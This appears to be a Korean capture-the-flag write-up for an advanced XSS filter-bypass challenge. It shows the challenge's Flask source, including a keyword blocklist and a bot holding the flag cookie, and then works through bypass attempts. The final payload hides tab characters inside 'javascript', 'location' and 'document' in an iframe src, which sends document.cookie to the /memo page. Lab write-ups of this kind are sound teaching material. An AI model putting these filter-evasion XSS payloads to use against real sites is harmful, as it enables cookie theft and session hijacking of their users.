xss 필터링 우회의 상위버전이다. 마찬가지로 코드분석은 xss-1에 기술되어 있으며 달라진 부분만 살펴보려고 한다.
코드분석
#!/usr/bin/python3
from flask import Flask, request, render_template
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
import urllib
import os
app = Flask(__name__)
app.secret_key = os.urandom(32)
try:
FLAG = open("./flag.txt", "r").read()
except:
FLAG = "[**FLAG**]"
def read_url(url, cookie={"name": "name", "value": "value"}):
cookie.update({"domain": "127.0.0.1"})
try:
service = Service(executable_path="/chromedriver")
options = webdriver.ChromeOptions()
for _ in [
"headless",
"window-size=1920x1080",
"disable-gpu",
"no-sandbox",
"disable-dev-shm-usage",
]:
options.add_argument(_)
driver = webdriver.Chrome(service=service, options=options)
driver.implicitly_wait(3)
driver.set_page_load_timeout(3)
driver.get("http://127.0.0.1:8000/")
driver.add_cookie(cookie)
driver.get(url)
except Exception as e:
driver.quit()
# return str(e)
return False
driver.quit()
return True
def check_xss(param, cookie={"name": "name", "value": "value"}):
url = f"http://127.0.0.1:8000/vuln?param={urllib.parse.quote(param)}"
return read_url(url, cookie)
def xss_filter(text):
_filter = ["script", "on", "javascript"]
for f in _filter:
if f in text.lower():
return "filtered!!!"
advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"]
for f in advanced_filter:
if f in text.lower():
return "filtered!!!"
return text
@app.route("/")
def index():
return render_template("index.html")
@app.route("/vuln")
def vuln():
param = request.args.get("param", "")
param = xss_filter(param)
return param
@app.route("/flag", methods=["GET", "POST"])
def flag():
if request.method == "GET":
return render_template("flag.html")
elif request.method == "POST":
param = request.form.get("param")
if not check_xss(param, {"name": "flag", "value": FLAG.strip()}):
return '<script>alert("wrong??");history.go(-1);</script>'
return '<script>alert("good");history.go(-1);</script>'
memo_text = ""
@app.route("/memo")
def memo():
global memo_text
text = request.args.get("memo", "")
memo_text += text + "\n"
return render_template("memo.html", memo=memo_text)
app.run(host="0.0.0.0", port=8000)필터링
def xss_filter(text): _filter = ["script", "on", "javascript"] for f in _filter: if f in text.lower(): return "filtered!!!" advanced_filter = ["window", "self", "this", "document", "location", "(", ")", "&#"] for f in advanced_filter: if f in text.lower(): return "filtered!!!" return text이번엔 필터링 사항이 있으면 바로 filtered!!! 와 함께 코드흐름이 끊기게 된다. 따라서 이전 방식인
scrionpt과 같은 방식으로 우회하는것은 불가능하다.
우선 아래 페이로드 사이에 탭을 넣어 (url_encoding => %09) 시도하였으나 실패하였다. 하지만 필터링은 당하지 않은것으로 보아 %09로 우회할 수 있겠다고 생각이 들었다.
<img src ="x" o nerror="lo cation.href = '/memo?memo='+do cument.cookie">test는 /vuln에서 그냥 바로 시도하면 되는거였다. 바보같이 python으로 필터함수 실행하고 있었다.
<img src="x" o%09nerror=alert%25281%2529>이번엔 그냥 onerror처리가 어떻게 되나해서 on사이에 %09를 넣고 alert를 하였으나 반응은 하지 않았다. 필터링에 걸리진 않았으나 onerror처리가 되지 않았다.
두가지 정도의 원인으로 보이는데
- onerror사이에 %09 들어가서 처리가 안되는 경우
- onerror는 처리할 수 있으니 (,) 괄호의 필터링으로 인해 실행이 안되는 경우
따라서 다른 태그를 써야겠다고 판단하였다.
<iframe src="javas%09cript:alert`123`">
iframe태그를 사용하면 간단하게 %09삽입만으로 XSS공격이 가능했다. 아래의 페이로드를 /flag경로에 파라미터로 넘겨주면
<iframe src="javasc ript:locatio n.href='/memo?memo='+do cument.cookie">/memo에서 플래그를 확인 할 수 있었다.
하루에 한걸음씩